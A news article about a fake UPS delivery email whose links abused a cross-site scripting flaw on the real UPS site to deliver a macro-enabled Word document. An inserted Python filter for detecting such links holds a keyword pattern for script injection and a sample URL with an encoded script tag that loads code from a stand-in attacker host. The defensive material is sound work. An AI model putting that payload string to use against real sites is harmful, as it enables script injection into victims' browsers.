Are you waiting for the package? Do not click on this fake UPS mail

Sophisticated scammers have been dropping malware on unsuspecting victims by inducing them to click on legitimate UPS tracking number links that direct them to the UPS.com website.

Phishing and malware scams can usually be avoided by checking the URL (web address) to which you are directed. Usually, if the URL and the site being spoofed do not match, it is a dead giveaway.

However, as reported by Twitter user Daniel Gallagher via Bleeping Computer, in this case the victim ended up on the real UPS website, and so may have been more inclined to trust the malicious Word document that was downloaded when he opened the tracking number page.

The Word document itself is intentionally unreadable until the reader clicks on "Enable Content" and more files are downloaded.

Gallagher called it "one of the best phishing emails I've seen in a long time."

UPS.com has since fixed the specific flaw that allowed this scammer to inject malicious code into the company's website, and most of the best antivirus software detects the malicious Word documents. However, this will not be the last time this method is used in phishing or "malspam" (malicious spam) campaigns.

The deception begins with a convincing e-mail message informing you that "a package has encountered an exception."

You are invited to "download and print an invoice to pick up your package at the UPS store" or click on a link for a tracking number.

The only hint that this is bogus is the email sender's address, which includes "unitedparcelservice" but has a different dot-com name. However, it would not be too difficult for the sender to "spoof" a legitimate UPS.com e-mail address if they wanted to.

Usually, email-based phishing scams can be avoided by hovering the mouse cursor over a link in the text. When you do so, the URL of the link will appear at the bottom of the screen.

In this case, however, hovering the mouse cursor over the tracking number or billing link will display the real UPS.com web address. Clicking on either will bring up a page on the UPS website that says, "Download will begin shortly."

The scammer exploits a cross-site scripting (XSS) flaw in the UPS site to add their own code, access another website, retrieve a Word document, and deliver it to site visitors.
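For mail filters, the point of the last few paragraphs is that a hostname check alone passes such a link, while inspecting the decoded query parameters for markup catches it. The following sketch is an added example, not code from the article or from UPS; the domain `www.shipping.example`, the parameter names `tracknum` and `loc`, and all sample URLs are constructed for illustration, and the pattern list is a heuristic.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed stand-in for the carrier's real domain; not taken from the article.
TRUSTED_HOSTS = {"www.shipping.example"}

# Markup or script syntax that has no place in a tracking-link parameter (heuristic).
SUSPICIOUS = re.compile(
    r"<\s*/?\s*(script|img|svg|iframe|body)\b|\bon\w+\s*=|javascript:|document\.|eval\(",
    re.IGNORECASE,
)

# Constructed sample links; parameter names "tracknum" and "loc" are hypothetical.
CLEAN = "https://www.shipping.example/track?tracknum=1Z0000000000000000&loc=en_US"
INJECTED = CLEAN + "%22%3E%3Cscript%20src%3D%22https%3A%2F%2Fcdn.attacker.example%2Fa.js%22%3E%3C%2Fscript%3E"
DOUBLE_ENCODED = CLEAN + "%2522%253E%253Cscript%253E"
LOOKALIKE = "https://www.shipping-tracking.example/track?tracknum=1Z0000000000000000"

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding, which can hide markup from a single decode."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def hover_check(url):
    """The reader's hover test: does the link point at the expected host?"""
    return urlsplit(url).hostname in TRUSTED_HOSTS

def injected_params(url):
    """Names of query parameters (or the fragment) whose decoded value looks like markup."""
    parts = urlsplit(url)
    hits = [name for name, value in parse_qsl(parts.query, keep_blank_values=True)
            if SUSPICIOUS.search(fully_decode(value))]
    if SUSPICIOUS.search(fully_decode(parts.fragment)):
        hits.append("#fragment")
    return hits

def verdict(url):
    """Combine both checks: host first, then parameter content."""
    if not hover_check(url):
        return "untrusted-host"
    return "trusted-host-with-injected-markup" if injected_params(url) else "clean"

if __name__ == "__main__":
    for url in (CLEAN, INJECTED, DOUBLE_ENCODED, LOOKALIKE):
        print(verdict(url), injected_params(url))
```
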

From here, the scheme becomes like a regular phishing/malspam scam, and this is the point at which it is most easily thwarted.

When you open that Word document, the text will be blurry and unreadable. Microsoft Word will tell you that macros (small scripts that can be run in Office files) are disabled, but the Word file tells you to "Enable Content" to see the text.

Needless to say, you should not enable content in a random Word, Excel, or PowerPoint document downloaded from the Internet.

However, if you do so, a macro in the Word document will probably download a malicious PNG image. Unfortunately, by the time Bleeping Computer was able to repeat this process, the image was no longer available, and it is not known exactly what this image contains.

Given the amount of deception and misdirection it took to get to this point, there is no doubt that the image was not benign.
